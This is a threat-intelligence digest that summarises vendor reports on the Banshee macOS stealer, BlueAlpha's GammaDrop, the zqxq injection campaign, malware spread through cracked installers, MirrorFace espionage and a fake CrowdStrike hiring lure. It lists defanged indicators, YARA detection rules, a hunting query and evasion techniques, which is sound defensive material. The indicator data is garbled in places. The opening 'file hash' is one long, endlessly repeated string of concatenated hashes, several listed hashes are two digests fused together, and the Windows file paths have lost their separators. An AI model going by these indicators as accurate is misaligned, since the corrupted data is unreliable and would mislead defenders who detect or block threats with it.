Indicator of Compromise :

• [IP Address] 41.216.183.49
• [IP Address] 41.216.183.96
• [Domain] authorisev[.]site
• [Domain] banshee-stealer[.]com
• [File Hash] cdfbcb3d850713c49d451b3e80fb8507f86ba4ad9385e083c2a2bf8d11adc4fb1dcf3b607d2c9e181643dd6bf1fd85e39d3dc4f95b6992e5a435d0d900333416d8ecc92571b3bcd935dcab9cdbeda7c2ebda3021dda013920ace35d294db07be00c68fb8bcb44581f15cb4f888b4dec8cd6d528cacb287dc1bdeeb34299b8c93ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaabb978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c23bcd41e8

  Banshee: The Stealer That “Stole Code” From MacOS XProtect — Check Point Research

  Check Point Research has been monitoring a new version of the Banshee macOS stealer malware since September 2024. This malware, linked to Russian-speaking cybercriminals, targets macOS users and steals browser and login credentials, cryptocurrency wallets, and sensitive information from files [1, 2]. Banshee uses a string encryption algorithm identical to the one Apple uses in its XProtect antivirus engine for macOS [1, 3].

  One notable difference between the leaked source code and the version discovered by Check Point Research is the use of a string encryption algorithm [1]. This new version remained undetected for over two months, successfully evading detection by most antivirus engines until the original version of Banshee Stealer was leaked on XSS forums in November 2024 [1, 4, 5]. This leak led the author to shut down the operations the following day [1]. Upon analyzing the new version, Check Point Research discovered that Banshee employs the same encryption method that Apple utilizes in macOS for string encryption within its antivirus engine, XProtect [3].

  Despite shutting down the stealer-as-a-service operation, threat actors continue to distribute the new version of Banshee via phishing websites [1]. Threat actors are distributing this new version mainly via phishing websites and malicious GitHub repositories [4]. In some GitHub campaigns, threat actors targeted both Windows and MacOS users with Lumma and Banshee Stealer [4]. One method of distribution involves malicious GitHub repositories targeting Windows users with Lumma Stealer and macOS users with Banshee Stealer [1].

  The malware’s core functionality remains largely unchanged, with updates primarily focusing on additional anti-analysis techniques [6]. These include using the fork() function to create a child process that may escape debuggers, closing open terminal sessions, initiating a daemon in the background, and redirecting standard input, output, and error streams to /dev/null to run silently [6]. The update also removed the language check that terminated the process if Russian was detected [7].

  The newer version of the Banshee Stealer targets a wide range of browsers, including Chrome, Brave, Edge, Vivaldi, Yandex, and Opera [8]. It also targets various browser extensions, primarily those related to cryptocurrency wallets, including authenticator.cc — Authenticator, a Two-Factor Authentication (2FA) extension [8, 9]. In addition, Banshee targets specific cryptocurrency wallets on the infected machine, including Exodus, Electrum, Coinomi, Guarda, Wasabi, Atomic, and Ledger [10].

  The stealer also collects system information such as: [10]

  • Software and Hardware information
  • External IP address
  • MacOS password

  Banshee exfiltrates stolen data by zipping the collected data, encrypting it using the campaign ID, encoding it with Base64, and sending it via a POST HTTP request to the command and control server [11].

  The initial command and control servers ran the Django framework, but subsequent campaigns and panel developments rebuilt the Relay Server using FastAPI, providing a single option for a POST request [12]. Currently, the server hosting the admin panel is hidden behind Relay servers, making it harder to detect and disrupt [13].

  Check Point Research has observed over 26 campaigns distributing the new version of Banshee [14]. Three of these campaigns used GitHub, while others appear to use different distribution methods [14]. Many campaigns involve phishing websites impersonating popular software [14].

  One recent campaign uses a phishing website impersonating a fake Telegram chat to distribute a malicious .dmg file [15]. The website uses JavaScript to check the user’s operating system and only displays the malicious download link to macOS users [15].

  While the Banshee stealer-as-a-service officially closed on November 24, 2024, due to the original source code being leaked, threat actors continue to use updated versions of the malware in new campaigns [16, 17]. It remains unclear if these campaigns are conducted by previous customers or if the creator is still involved [16].

  IOCs

  File Hashes

  • cdfbcb3d850713c49d451b3e80fb8507f86ba4ad9385e083c2a2bf8d11adc4fb1dcf3b607d2c9e181643dd6bf1fd85e39d3dc4f95b6992e5a435d0d900333416
  • d8ecc92571b3bcd935dcab9cdbeda7c2ebda3021dda013920ace35d294db07be
  • 00c68fb8bcb44581f15cb4f888b4dec8cd6d528cacb287dc1bdeeb34299b8c93ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038
  • d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c2
  • 3bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaab
  • b978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114
  • ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038

  IP Addresses

  • 41.216.183.49
  • 41.216.183.49
  • 65.108.186.71
  • 41.216.107.90
  • 185.1.161.213
  • 45.150.33.99
  • 85.184.11.127
  • 185.2.167.1
  • 213.164.238.108
  • 67.230.196.160
  • 41.216.183.49
  • 193.233.169.189

  Domains

  • authorisev[.]site
  • contemteny[.]site
  • dilemmadu[.]site
  • faulteyotk[.]site
  • forbidstow[.]site
  • goalyfeastz[.]site
  • opposezmny[.]site
  • seallysl[.]site
  • servicedny[.]site
  • banshee-stealer[.]com
  • hxxps://steamcommunity[.]com/profiles/76561199724331900
  • hxxp://api7[.]cfd/testet123t/
  • hxxps://coincapy[.]com/zx/
  • hxxps://fotor[.]software/MediaKIT
  • hxxps://fotor[.]software/MacOS/Collaboration
  • hxxps://api7[.]cfd/testet123t/

  YARA Rules

  private rule macos_binary

  {

  meta:

  author = “Antonis Terefos @Tera0017/@Check Point Research”

  descr = “MacOS file format”

  condition:

  uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xBEBAFECA

  }

  rule banshee_macos

  {

  meta:

  author = “Antonis Terefos @Tera0017/@Check Point Research”

  descr = “Banshee MacOS stealer, encrypted strings version”

  sha256 = “ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038”

  strings:

  // x64

  $x64_code_str_decr1 = {80 E1 ?? (48| 49) 89 (DE| F0| FE) (48| 49) D3 (EE| E8) (40| 44) 30 ?? 48 83 C2 08}

  $x64_code_str_decr12 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38}

  $x64_code_str_decr2 = {48 89 ?? 48 D3 [1, 18] 30 ?? 48 83 C1 08 48 FF C?}

  $x64_code_str_decr3 = {81 30 [4] C6 40 04 00}

  $x64_code_str_decr4 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}

  $x64_code_campid = {88 14 08 8A 54 31 02 48 FF C1 48 83 F9 1D}

  $x64_code_gen1 = {C6 40 09 00 31 C9 8A 14 08}

  $x64_code_gen2 = {88 14 31 8A 54 30 02 48 FF C6 84 D2}

  $x64_code_gen3 = {72 00 77 00 [17] 00 3B 00 00}

  // Arm

  $arm_code_str_decr1 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}

  $arm_code_str_decr2 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}

  $arm_code_campid = {6C 01 09 8B 0A 69 29 38 8A 05 40 39 29 05 00 91 3F 79 00 F1}

  $arm_code_gen1 = {1F 24 00 39 08 00 80 D2}

  $arm_code_gen2 = {72 00 77 00 [17] 00 3B 00 00}

  condition:

  macos_binary and 6 of ($x64_code*) or all of ($arm_code*)

  }

  Original Link: https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/

  BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure

  BlueAlpha, a Russian state-sponsored threat group, is conducting a cyber-espionage campaign targeting Ukrainian-speaking individuals and organizations. The group has been observed delivering malicious HTML smuggling attachments through spearphishing to download and execute GammaDrop and GammaLoad malware variants. BlueAlpha leverages Cloudflare Tunnels to conceal staging infrastructure used by GammaDrop to evade traditional network detection mechanisms. The campaign has been ongoing since at least early 2024 and has remained largely consistent in its techniques, tactics, and procedures (TTPs), with only slight changes in tooling and infrastructure.

  Techniques:

  • HTML Smuggling: BlueAlpha is using HTML smuggling to deliver VBScript-based malware GammaLoad.
  • Cloudflare Tunnels: BlueAlpha is abusing Cloudflare Tunnels to conceal the staging infrastructure used by GammaDrop. This allows the group to effectively evade traditional network detection mechanisms and further complicate efforts to identify and block its activities.
  • DNS fast-fluxing: BlueAlpha continues to use DNS fast-fluxing of GammaLoad command-and-control (C2) infrastructure to complicate tracking and disruption of C2 communications to preserve access to compromised systems.
  • Spearphishing: BlueAlpha continues to target Ukrainian entities with spearphishing campaigns. The spearphishing emails contain malicious HTML attachments that deliver the GammaLoad malware.

  Malware:

  • GammaDrop: An HTML application (HTA) payload used to execute and set the persistence of an embedded GammaLoad payload.
  • GammaLoad: A custom backdoor used by BlueAlpha, with variants in both PowerShell and VBScript. Its main functionality is to beacon indefinitely to its C2 server and execute any encoded VBScript it receives as responses from the C2. GammaLoad retrieves host information such as the victim’s computer name and the hex-encoded serial number of the victim’s hard drive within the User-Agent string. If the initial connection to the C2 server fails, GammaLoad will use a fast-flux DNS technique to find the latest C2 IP address. This particular GammaLoad variant uses both traditional DNS and DNS over HTTPS (DoH) for resolution.

  Infection Chain:

  • The attack starts with a spearphishing email containing a malicious HTML attachment.
  • The attachment uses XHTML smuggling to deliver a 7zip file containing a .lnk file.
  • The .lnk file uses mshta.exe to download and execute the GammaDrop .hta file from a Cloudflare Tunnel.
  • GammaDrop executes and sets the persistence of an embedded GammaLoad payload.
  • GammaLoad beacons to its C2 server and executes any commands it receives.

  IOCs

  Domains:

  • else-accommodation-allowing-throws.trycloudflare[.]com
  • cod-identification-imported-carl.trycloudflare[.]com
  • amsterdam-sheet-veteran-aka.trycloudflare[.]com
  • benjamin-unnecessary-mothers-configured.trycloudflare[.]com
  • longitude-powerpoint-geek-upgrade.trycloudflare[.]com
  • attribute-homework-generator-lovers.trycloudflare[.]com
  • infected-gc-rhythm-yu.trycloudflare[.]com

  IP Addresses:

  • 178.130.42[.]94

  Hashes:

  • 3afc8955057eb0bae819ead1e7f534f6e5784bbd5b6aa3a08af72e187b157c5b
  • 93aa6cd0787193b4ba5ba6367122dee846c5d18ad77919b261c15ff583b0ca17
  • b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda

  Original Link: https://go.recordedfuture.com/hubfs/reports/cta-ru-2024-1205.pdf

  GroupGreeting e-card site attacked in “zqxq” campaign

  A widespread cyberattack, referred to as the “zqxq” campaign, compromised GroupGreeting[.]com, a popular platform used to send digital greeting cards. The attack used JavaScript injection techniques that have been seen in other large-scale malware injection campaigns, like NDSW/NDSX. Cybercriminals are taking advantage of websites with high traffic during the holidays, like greeting card websites, because there are more opportunities to target unsuspecting visitors. Over 2,800 websites have been hit with similar malicious code.

  Techniques

  • JavaScript Injection
  • Token Generation and Redirection
  • Conditional Checks and Evasion
  • Remote Payload Retrieval
  • Traffic Distribution System

  The attack was likely coordinated because of GroupGreeting.com’s high profile, seasonal traffic spikes, and the potential for the malware to persist. Once activated, the malware redirects the user to external domains that could host phishing pages or more serious malware like info stealers or ransomware.

  IOCs

  • IP Address: 104.22.78.165

  Original Link: https://www.malwarebytes.com/blog/news/2025/01/groupgreeting-e-card-site-attacked-inzqxq-campaign

  How Cracks and Installers Bring Malware to Your Device

  Threat actors are distributing malware disguised as legitimate software installers, often targeting users seeking pirated software. They lure victims through fake YouTube tutorials and use reputable file-hosting services like Mediafire and Mega.nz to distribute the malware. The malware is commonly password-protected and encoded to evade detection. Users searching for software cracks on search engines may encounter malicious links hosted on platforms like OpenSea and SoundCloud.

  Once a user downloads and executes the fake installer, it often employs techniques like process injection, DLL sideloading, and large file sizes to further evade detection. The malware collects sensitive data from web browsers, including credentials. In some cases, the initial infection leads to the download of additional malware, including various info stealers.

  Techniques:

  • Distribution via fake YouTube tutorials
  • Use of reputable file-hosting services
  • Password protection and encoding of malware
  • Search engine poisoning
  • Malicious links hosted on trusted platforms
  • Process injection
  • DLL sideloading
  • Large file sizes
  • Persistence via autorun registry entries and scheduled tasks

  Malware:

  • Info stealers (including LUMMASTEALER, PRIVATELOADER, MARSSTEALER, AMADEY, PENGUISH, VIDAR)

  Hunting Queries:

  Trend Vision One Search App

  Potential autoit script construction: parentCmd:(“.exe”) AND processCmd:(“/c move*.cmd*&.cmd”) AND objectCmd:(“/c copy /b ..*+ ..*”)

  Domains:

  • tech-cloud.org
  • data privacycourses.com

  Original Link: https://www.trendmicro.com/en_us/research/25/a/how-cracks-and-installers-bring-malware-to-your-device.html

  MirrorFace hackers targeting Japanese govt, politicians since 2019

  The Chinese state-backed hacking group MirrorFace (also known as Earth Kasha) has been conducting a cyber-espionage campaign targeting Japanese government entities, politicians, and technology sectors since 2019. The group aims to steal sensitive information and intelligence related to valuable technology and national security.

  Techniques

  • Exploit vulnerabilities in networking equipment
  • Employ malware for data exfiltration and persistent access
  • Use Visual Studio Code tunnels for covert communication
  • Execute malware within Windows Sandbox to evade antivirus detection

  Malware

  • MirrorStealer (credential stealer)
  • LODEINFO (backdoor)
  • ANEL
  • NOOPDOOR

  Targets

  Campaign A (2019–2023)

  • Think tanks
  • Government entities
  • Politicians
  • Media

  Campaign B (2023)

  • Semiconductor industry
  • Manufacturing industry
  • ICT
  • Academia
  • Aerospace sector

  Campaign C (2024–present)

  • Academia
  • Think tanks
  • Politicians
  • Media

  Evasion Methods

  • Visual Studio Code Tunnels: MirrorFace leverages Visual Studio Code tunnels, set up by the ANEL malware, to receive and execute commands on infected systems. This tactic, observed since at least June 2024, allows for covert communication and command execution. This tactic has been used by other Chinese state-sponsored hackers.
  • Windows Sandbox: Since June 2023, MirrorFace has been using the Windows Sandbox feature to execute LOADEINFO malware in an isolated environment, bypassing antivirus detection. This method exploits the fact that the host operating system does not monitor the Windows Sandbox environment, enabling malware execution and communication with C2 servers while maintaining access to the host’s file system.

  Hunting Methods

  • Monitor suspicious PowerShell logs
  • Monitor unauthorized communication with Visual Studio Code domains
  • Monitor unusual sandbox activity
  • Configure Windows policies to audit process creation and detect Windows Sandbox launches

  Original Link: https://www.bleepingcomputer.com/news/security/mirrorface-hackers-targeting-japanese-govt-politicians-since-2019/

  Recruitment Phishing Scam Imitates Hiring Process

  A phishing campaign is targeting job seekers with fake CrowdStrike recruitment emails. The emails direct victims to a website that mimics the CrowdStrike hiring process and tricks them into downloading a malicious executable disguised as a CRM application installer. Upon execution, the malware downloads and runs the XMRig cryptocurrency miner in the background, using the victim’s computing resources for mining Monero without their knowledge or consent. The executable also establishes persistence mechanisms to ensure the miner continues running even after the system is rebooted.

  Techniques

  • Phishing emails
  • Fake website mimicking a legitimate hiring process
  • Malicious executable disguised as legitimate software
  • Downloading and executing a cryptocurrency miner
  • Establishing persistence via a Windows batch script in the Start Menu Startup directory and a Windows Registry logon autostart key

  Recommendations from the source

  • Verify the authenticity of CrowdStrike communications and avoid downloading unsolicited files.
  • Educate employees on phishing tactics.
  • Monitor for suspicious network traffic.
  • Employ endpoint protection solutions to detect and block malicious activity.

  IOCs

  Domains

  • cscrm-hiring[.]com

  URLs

  • https[:]//cscrm-hiring[.]com/cs-applicant-crm-installer[.]zip
  • http[:]//93.115.172[.]41/private/aW5zdHJ1Y3Rpb25zCg==.txt
  • http[:]//github[.]com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip

  IP Addresses

  • 93.115.172[.]41

  File Hashes

  • 96558bd6be9bcd8d25aed03b996db893ed7563cf10304dffe6423905772bbfa1 (SHA-256 hash of ZIP file containing fake CRM application executable)
  • 62f3a21db99bcd45371ca4845c7296af81ce3ff6f0adcaee3f1698317dd4898b (SHA-256 hash of fake CRM application executable)
  • 7c370211602fcb54bc988c40feeb3c45ce249a8ac5f063b2eb5410a42adcc030 (SHA-256 hash of downloaded XMRig configuration text file)

  File Paths

  • %TEMP%Systemtemp.zip
  • %TEMP%Systemprocess.exe
  • %LOCALAPPDATA%System32config.exe
  • %LOCALAPPDATA%System32process.exe
  • %APPDATA%MicrosoftWindowsStart MenuProgramsMaintenanceinfo.txt
  • %APPDATA%MicrosoftWindowsStart MenuProgramsStartupstartup.bat

  Registry Paths

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunconfig

  Other Indicators

  • 93.115.172[.]41:1300 (Mining Pool hosted by threat actor)

  Original Link: https://www.crowdstrike.com/en-us/blog/recruitment-phishing-scam-imitates-crowdstrike-hiring-process/